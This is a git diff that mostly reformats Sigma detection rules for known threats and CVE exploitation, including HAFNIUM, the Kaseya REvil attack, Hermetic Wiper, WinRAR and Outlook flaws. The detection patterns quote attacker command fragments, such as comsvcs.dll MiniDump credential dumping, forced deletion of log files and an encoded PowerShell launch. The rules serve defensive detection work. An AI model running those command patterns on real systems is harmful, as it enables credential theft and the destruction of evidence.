Small Sieve malware references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -21,8 +20,8 @@ detection: selection_path: ObjectName|contains: \Microsoft\Windows\CurrentVersion\Run\ selection_value: - - ObjectName|contains: Microsift - - NewValue|contains: .exe Platypus + - ObjectName|contains: Microsift + - NewValue|contains: .exe Platypus condition: registry_set and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml index fa4d37b7c..f01a1996e 100644 --- a/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml +++ b/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml @@ -1,8 +1,7 @@ title: HAFNIUM Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 status: test -description: Detects activity observed by different researchers to be HAFNIUM group - activity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers references: - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ @@ -26,52 +25,52 @@ detection: EventID: 4688 Channel: Security selection_attrib: - CommandLine|contains|all: + CommandLine|contains|all: - attrib - ' +h ' - ' +s ' - ' +r ' - .aspx selection_vsperfmon: - - NewProcessName|contains: \ProgramData\VSPerfMon\ - - CommandLine|contains|all: - - schtasks - - VSPerfMon + - NewProcessName|contains: \ProgramData\VSPerfMon\ + - CommandLine|contains|all: + - schtasks + - VSPerfMon selection_opera_1: - NewProcessName|endswith: Opera_browser.exe + NewProcessName|endswith: Opera_browser.exe ParentProcessName|endswith: - \services.exe - \svchost.exe selection_opera_2: - NewProcessName|endswith: Users\Public\opera\Opera_browser.exe + NewProcessName|endswith: Users\Public\opera\Opera_browser.exe selection_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - Temp\__output selection_makecab_1: - CommandLine|contains|all: + CommandLine|contains|all: - inetpub\wwwroot\ - .dmp.zip - NewProcessName|endswith: \makecab.exe + NewProcessName|endswith: \makecab.exe selection_makecab_2: - CommandLine|contains: + CommandLine|contains: - Microsoft\Exchange Server\ - compressionmemory - .gif - NewProcessName|endswith: \makecab.exe + NewProcessName|endswith: \makecab.exe selection_7zip: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t7z ' - C:\Programdata\pst - \it.zip selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - \comsvcs.dll - Minidump - 'full ' - \inetpub\wwwroot selection_other: - CommandLine|contains: + CommandLine|contains: - Windows\Temp\xx.bat - Windows\WwanSvcdcs - Windows\Temp\cw.exe diff --git a/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml index bc978cb85..7ff674180 100644 --- a/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml +++ b/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml @@ -1,8 +1,7 @@ title: REvil Kaseya Incident Malware Patterns id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5 status: test -description: Detects process command line patterns and locations used by REvil group - in Kaseya incident (can also match on other malware) +description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) references: - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers - https://www.joesandbox.com/analysis/443736/0/html @@ -25,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - C:\Windows\cert.exe - del /q /f c:\kworking\agent.crt - Kaseya VSA Agent Hot-fix @@ -35,13 +34,13 @@ detection: - c:\kworking1\agent.exe - c:\kworking1\agent.crt selection2: - NewProcessName: + NewProcessName: - C:\Windows\MsMpEng.exe - C:\Windows\cert.exe - C:\kworking\agent.exe - C:\kworking1\agent.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /q /f - WebPages\Errors\webErrorLog.txt condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml index 980b17bfa..13615cfa6 100644 --- a/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml +++ b/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml @@ -23,18 +23,18 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - windows\system32\Physmem.sys - Windows\system32\ime\SHARED\WimBootConfigurations.ini - Windows\system32\ime\IMEJP\WimBootConfigurations.ini - Windows\system32\ime\IMETC\WimBootConfigurations.ini registry_image: - CommandLine|contains: reg add - NewProcessName|contains: + CommandLine|contains: reg add + NewProcessName|contains: - windows\system32\filepath2 - windows\system32\ime registry_key: - CommandLine|contains: + CommandLine|contains: - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32 - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32 condition: process_creation and (selection or all of registry_*) diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml index 7d506ed68..5521500b4 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml +++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml @@ -20,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Windows\System32\mqsvc.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml index d95f0ceb6..0b9627f8c 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml +++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml @@ -1,16 +1,10 @@ title: Potential CVE-2022-29072 Exploitation Attempt id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3 status: test -description: 'Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege - escalation and command execution vulnerability. - - 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) - and command execution when a file with the .7z extension is dragged to the Help>Contents - area. This is caused by misconfiguration of 7z.dll and a heap overflow. - +description: | + Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. + 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. - - ' references: - https://github.com/kagancapar/CVE-2022-29072 - https://twitter.com/kagancapar/status/1515219358234161153 @@ -29,17 +23,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentProcessName|endswith: \7zFM.exe filter_bat: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' /k ' - ' /r ' filter_null: - CommandLine: null + CommandLine: condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml index 8dcffccb7..fc80fe972 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml +++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml @@ -1,8 +1,7 @@ title: Suspicious Sysmon as Execution Parent id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3 status: experimental -description: Detects suspicious process executions in which Sysmon itself is the parent - of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 - https://twitter.com/filip_dragovic/status/1590052248260055041 @@ -27,17 +26,17 @@ detection: - \Sysmon.exe - \Sysmon64.exe filter_main_generic: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\Sysmon.exe - :\Windows\Sysmon64.exe - :\Windows\System32\conhost.exe - - :\Windows\System32\WerFault.exe - - :\Windows\System32\WerFaultSecure.exe + - :\Windows\System32\WerFault.exe # When Sysmon crashes + - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes - :\Windows\System32\wevtutil.exe - :\Windows\SysWOW64\wevtutil.exe - - \AppData\Local\Temp\Sysmon.exe + - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version. filter_main_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml b/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml index 5bcebaf11..d463111cc 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml @@ -1,8 +1,7 @@ title: BlueSky Ransomware Artefacts id: eee8311f-a752-44f0-bf2f-6b007db16300 status: experimental -description: Detect access to files and shares with names and extensions used by BlueSky - ransomware which could indicate a current or previous encryption attempt. +description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt. references: - https://unit42.paloaltonetworks.com/bluesky-ransomware/ author: j4son @@ -22,13 +21,13 @@ detection: - 4663 - 4656 selection_access_data: - - ObjectName|endswith: .bluesky - - ObjectName|contains: DECRYPT FILES BLUESKY + - ObjectName|endswith: .bluesky + - ObjectName|contains: DECRYPT FILES BLUESKY selection_share_eid: EventID: 5145 selection_share_data: - - RelativeTargetName|endswith: .bluesky - - RelativeTargetName|contains: DECRYPT FILES BLUESKY + - RelativeTargetName|endswith: .bluesky + - RelativeTargetName|contains: DECRYPT FILES BLUESKY condition: security and (all of selection_access_* or all of selection_share_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml index ed44f576b..4bff8d5dd 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml @@ -1,8 +1,7 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: test -description: Detects process execution patterns found in intrusions related to the - Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia author: Florian Roth (Nextron Systems) @@ -21,15 +20,15 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \policydefinitions\postgresql.exe + NewProcessName|endswith: \policydefinitions\postgresql.exe selection2: - - CommandLine|contains: - - CSIDL_SYSTEM_DRIVE\temp\sys.tmp - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - \winupd.log full + - CommandLine|contains: + - CSIDL_SYSTEM_DRIVE\temp\sys.tmp + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - \winupd.log full condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml index 0c32f4b5c..232ecd0ce 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml @@ -1,8 +1,7 @@ title: Potential Raspberry Robin Dot Ending File id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a status: test -description: Detects commandline containing reference to files ending with a "." This - scheme has been seen used by raspberry-robin +description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -19,7 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} + # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png + # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png + # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png + CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml b/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml index 461d0162a..acaf0e817 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml @@ -1,8 +1,7 @@ title: MSSQL Extended Stored Procedure Backdoor Maggie id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8 status: test -description: This rule detects the execution of the extended storage procedure backdoor - named Maggie in the context of Microsoft SQL server +description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server references: - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 author: Denis Szadkowski, DIRT / DCSO CyTec diff --git a/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml index b63e62fea..6057c3acd 100644 --- a/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml +++ b/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml @@ -1,8 +1,7 @@ title: Potential ACTINIUM Persistence Activity id: e1118a8f-82f5-44b3-bb6b-8a284e5df602 status: test -description: Detects specific process parameters as used by ACTINIUM scheduled task - persistence creation. +description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. references: - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations author: Andreas Hunkeler (@Karneades) @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - create - wscript diff --git a/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml index caf1ac2c6..5c0b098dc 100644 --- a/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml +++ b/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml @@ -20,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - -exec bypass -w 1 -enc - - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA + - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml index ac81084f0..32d19b72f 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml @@ -1,14 +1,11 @@ title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db related: - - id: f8987c03-4290-4c96-870f-55e75ee377f4 - type: similar + - id: f8987c03-4290-4c96-870f-55e75ee377f4 + type: similar status: experimental -description: 'Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center - / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. - create admin accounts and execute arbitrary commands. - - ' +description: | + Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. references: - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment @@ -36,12 +33,13 @@ detection: - \tomcat9.exe - \tomcat10.exe selection_child: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + # Note: Only children associated with known campaigns + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml index 815f9dc97..ce540193e 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml @@ -1,10 +1,7 @@ title: Outlook Task/Note Reminder Received id: fc06e655-d98c-412f-ac76-05c2698b1cb2 status: experimental -description: Detects changes to the registry values related to outlook that indicates - that a reminder was triggered for a Note or Task item. This could be a sign of - exploitation of CVE-2023-23397. Further investigation is required to determine - the success of an exploitation. +description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. references: - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml index d83e7e579..f8939caee 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml @@ -1,8 +1,7 @@ title: CVE-2023-23397 Exploitation Attempt id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c status: experimental -description: Detects outlook initiating connection to a WebDAV or SMB share, which - could be a sign of CVE-2023-23397 exploitation. +description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. author: Robert Lee @quantum_cookie date: 2023/03/16 modified: 2023/03/22 @@ -16,8 +15,7 @@ tags: logsource: service: security product: windows - definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry - keys used in this rule' + definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry keys used in this rule' detection: security: Channel: Security @@ -26,16 +24,16 @@ detection: - 4656 - 4663 ProcessName|endswith: \OUTLOOK.EXE + # Example: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet001\Services\WebClient\NetworkProvider ObjectName|contains|all: - \REGISTRY\MACHINE\SYSTEM - Services\ ObjectName|endswith: - WebClient\NetworkProvider - LanmanWorkstation\NetworkProvider - AccessList|contains: '%%4416' + AccessList|contains: '%%4416' # "Query key value" condition: security and selection falsepositives: - - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, - it's better to filter out those events before they reach the SIEM + - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM level: critical ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml index 5850373a4..a6a65c13c 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-23397 Exploitation Attempt - SMB id: de96b824-02b0-4241-9356-7e9b47f04bac status: experimental -description: Detects (failed) outbound connection attempts to internet facing SMB - servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. +description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. references: - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,15 +17,18 @@ detection: smbclient_connectivity: Channel: Microsoft-Windows-SmbClient/Connectivity selection: + # Author Note: You could adapt this rule to use the "ServerName" field and uncomment the commented EventIDs. But you need to provide your own filter for "trusted server names" EventID: - - 30803 - - 30804 - - 30806 + # - 30800 # The server name cannot be resolved. (Doesn't contain the "ServerAddress" field) + - 30803 # Failed to establish a network connection. + - 30804 # A network connection was disconnected. + - 30806 # The client re-established its session to the server. + # - 31001 # Error (Doesn't contain the "ServerAddress" field) filter_main_local_ips: ServerAddress|startswith: - - '10.' - - 192.168. - - 172.16. + - '10.' # 10.0.0.0/8 + - 192.168. # 192.168.0.0/16 + - 172.16. # 172.16.0.0/12 - 172.17. - 172.18. - 172.19. @@ -42,11 +44,10 @@ detection: - 172.29. - 172.30. - 172.31. - - '127.' - - 169.254. + - '127.' # 127.0.0.0/8 + - 169.254. # 169.254.0.0/16 condition: smbclient_connectivity and (selection and not 1 of filter_main_*) falsepositives: - - Some false positives may occur from external trusted servers. Apply additional - filters accordingly + - Some false positives may occur from external trusted servers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml index 35ed905a2..5fcb96159 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36884 Exploitation - Share Access id: 3df95076-9e78-4e63-accb-16699c3b74f8 status: experimental -description: Detects access to a file share with a naming schema seen being used during - exploitation of CVE-2023-36884 +description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 references: - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit author: Nasreddine Bencherchali (Nextron Systems) @@ -14,8 +13,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit File Share" - must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure detection: security: Channel: Security diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml index 6340172b9..fed5935a0 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml @@ -1,11 +1,10 @@ title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 related: - - id: e4556676-fc5c-4e95-8c39-5ef27791541f - type: similar + - id: e4556676-fc5c-4e95-8c39-5ef27791541f + type: similar status: experimental -description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), - where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. references: - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md @@ -26,19 +25,20 @@ detection: selection_parent: ParentProcessName|endswith: \WinRAR.exe selection_folder: - CommandLine|contains: \AppData\Local\Temp\Rar$ + CommandLine|contains: \AppData\Local\Temp\Rar$ selection_double_ext: - CommandLine|re: \.[a-zA-Z0-9]{1,4} \. + CommandLine|re: \.[a-zA-Z0-9]{1,4} \. selection_binaries: - - NewProcessName|endswith: - - \cmd.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe + # Note: add additional binaries that the attacker might use + - NewProcessName|endswith: + - \cmd.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml index 2f1826af3..d0076ebdc 100644 --- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml +++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml @@ -1,8 +1,7 @@ title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash id: e5a29b54-6fe7-4258-8a23-82960e31231a status: experimental -description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. - This could indicate potential exploitation of CVE-2023-40477 +description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 references: - 